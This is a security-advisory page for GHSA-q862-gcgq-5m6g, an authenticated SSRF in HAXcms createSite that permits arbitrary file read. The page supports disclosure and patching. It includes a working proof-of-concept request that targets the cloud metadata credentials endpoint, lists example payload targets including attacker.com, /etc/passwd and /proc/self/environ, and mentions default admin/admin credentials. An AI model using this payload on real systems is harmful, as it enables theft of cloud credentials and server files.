What is GHSA-q862-gcgq-5m6g?

GHSA-q862-gcgq-5m6g is a security advisory published by GitHub Security Advisories with High severity. HAXcms createSite SSRF Enables Arbitrary File Read

Which CVE IDs does GHSA-q862-gcgq-5m6g cover?

GHSA-q862-gcgq-5m6g covers the following CVE IDs: CVE-2026-46393. Each CVE has its own detail page on EchelonGraph Pulse with the synthesized EG score.

Which products are affected by GHSA-q862-gcgq-5m6g?

GHSA-q862-gcgq-5m6g affects 1 product, including: npm/@haxtheweb/haxcms-nodejs:\u003c= 25.0.0.

GHSA-q862-gcgq-5m6gHigh

HAXcms createSite SSRF Enables Arbitrary File Read

Vendor

GitHub Security Advisories

Published

May 19, 2026

Last Modified

May 19, 2026

🔗 CVE IDs covered (1)

CVE-2026-46393 →

📋 Description

Summary

An authenticated Server-Side Request Forgery (SSRF) vulnerability in HAXcms allows users to fetch arbitrary internal or local resources and write the responses to a web-accessible directory, enabling arbitrary file read and internal network access.

Details

The createSite endpoint in HAXcms (v11.0.6) accepts a build.files parameter that allows an authenticated user to supply arbitrary URLs or local file paths. This input is processed without validation and ultimately fetched server-side using file_get_contents().

The data flow is as follows:

User input (build.files) is processed via object_to_array() into a PHP array
Assigned to $filesToDownload in Operations.php (line 2626)
Iterated over in Operations.php (line 2730), where each entry is passed to HAXCMSFile::save() with bulk-import enabled

In HAXCMSFile.php (line 30), the following occurs:

file_get_contents($upload['tmp_name']);

Here, tmp_name is attacker-controlled and may contain:

External URLs (http://attacker.com)
Internal services (http://127.0.0.1)
Cloud metadata endpoints (http://169.254.169.254)
Local file paths (/etc/passwd, /proc/self/environ)

The bulk-import flag bypasses is_uploaded_file() validation, which normally ensures the file originates from a legitimate upload. The only restriction is an extension whitelist based on the filename (array key), which is fully attacker-controlled.

There are no restrictions on:

URL schemes (http, file, gopher, etc.)
Destination IP ranges (internal, loopback, metadata services)
Response content

All fetched content is written to:

sites/<sitename>/files/<filename>

and is accessible via the web.

PoC

Prerequisites:

Authenticated session (default credentials: admin/admin on fresh installs)
Valid JWT and CSRF token

Step 1: Log in and capture JWT + CSRF token

Step 2: Send crafted request:

POST /createSite HTTP/1.1
Host: target
Authorization: Bearer [JWT]
X-CSRF-Token: [TOKEN]
Content-Type: application/json

{
  "site": {
    "name": "poc"
  },
  "build": {
    "files": {
      "poc.txt": {
        "tmp_name": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
      }
    }
  }
}

Step 3: Retrieve response:

GET /sites/poc/files/poc.txt

The response will contain the fetched content (e.g., cloud credentials or internal service data).

Impact

SSRF enabling access to internal network services
Arbitrary file read via local filesystem paths
Cloud credential exposure through metadata endpoints
Data exfiltration via web-accessible file storage

Any authenticated user can exploit this to access sensitive server or infrastructure data, potentially leading to full system or cloud environment compromise.

🎯 Affected products1

npm/@haxtheweb/haxcms-nodejs:<= 25.0.0